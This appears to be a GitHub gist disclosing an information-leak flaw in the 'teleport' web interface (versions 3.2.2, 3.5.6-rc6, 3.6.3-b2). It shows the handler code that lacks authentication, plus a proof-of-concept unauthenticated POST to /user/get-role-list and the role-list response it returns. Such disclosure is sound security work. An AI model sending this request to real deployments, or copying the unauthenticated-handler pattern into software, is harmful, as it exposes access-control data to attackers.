-
-
Save arleyna/20d858e11c48984d00926fa8cc0c2722 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# The name of an affected Product | |
teleport | |
# The affected or fixed version(s). | |
> teleport - 3.2.2 | |
> teleport - 3.5.6-rc6 | |
> teleport - 3.6.3-b2 | |
# Vulnerability Type | |
Unauthorized access vulnerability | |
# Root Cause | |
``` | |
data/www/teleport/webroot/app/controller/__init__.py | |
``` | |
Some path interface. | |
``` | |
(r'/user/group', user.GroupListHandler), | |
# - 某个用户组的管理页面 | |
(r'/user/group/(.*)', user.GroupInfoHandler), | |
# - [json] 获取用户组列表(包括不超过5个组内成员) | |
(r'/user/get-groups-with-member', user.DoGetGroupWithMemberHandler), | |
# - [json] 获取角色列表 | |
(r'/user/get-role-list', user.DoGetRoleListHandler), | |
# - [json] 批量设置角色 | |
(r'/user/set-role', user.DoSetRoleForUsersHandler), | |
``` | |
Follow up ```user.DoGetRoleListHandler``` method. | |
``` | |
data/www/teleport/webroot/app/controller/user.py | |
``` | |
``` | |
class DoGetRoleListHandler(TPBaseJsonHandler): | |
def post(self): | |
err, role_list = user.get_role_list() | |
if err != TPE_OK: | |
self.write_json(err) | |
else: | |
self.write_json(TPE_OK, data=role_list) | |
``` | |
Missing validation | |
# POC | |
Requests: | |
``` | |
POST /user/get-role-list HTTP/1.1 | |
Host: 127.0.0.1:7190 | |
Content-Length: 4 | |
Connection: close | |
xx | |
``` | |
Responses: | |
``` | |
HTTP/1.1 200 OK | |
Server: TornadoServer/6.1 | |
Content-Type: application/json; charset=UTF-8 | |
Date: Wed, 16 Nov 2022 07:18:38 GMT | |
Access-Control-Allow-Origin: * | |
Access-Control-Allow-Headers: * | |
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS | |
Content-Length: 293 | |
Set-Cookie: _sid=tp_1668583118_a918a432f2b4bcf2; Path=/ | |
Connection: close | |
{"code": 0, "message": "", "data": [{"id": 1, "name": "\u7cfb\u7edf\u7ba1\u7406\u5458", "privilege": 4294967295}, {"id": 2, "name": "\u8fd0\u7ef4\u4eba\u5458", "privilege": 513}, {"id": 3, "name": "\u5ba1\u8ba1\u5458", "privilege": 32769}, {"id": 4, "name": "ok\u89d2\u8272", "privilege": 1}]} | |
``` | |
# Impact | |
Teleport v3.2.2, Teleport v3.5.6-rc6, and Teleport v3.6.3-b2 was discovered to contain an information leak via the /user/get-role-list web interface. |
Author
arleyna
commented
Nov 16, 2022
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment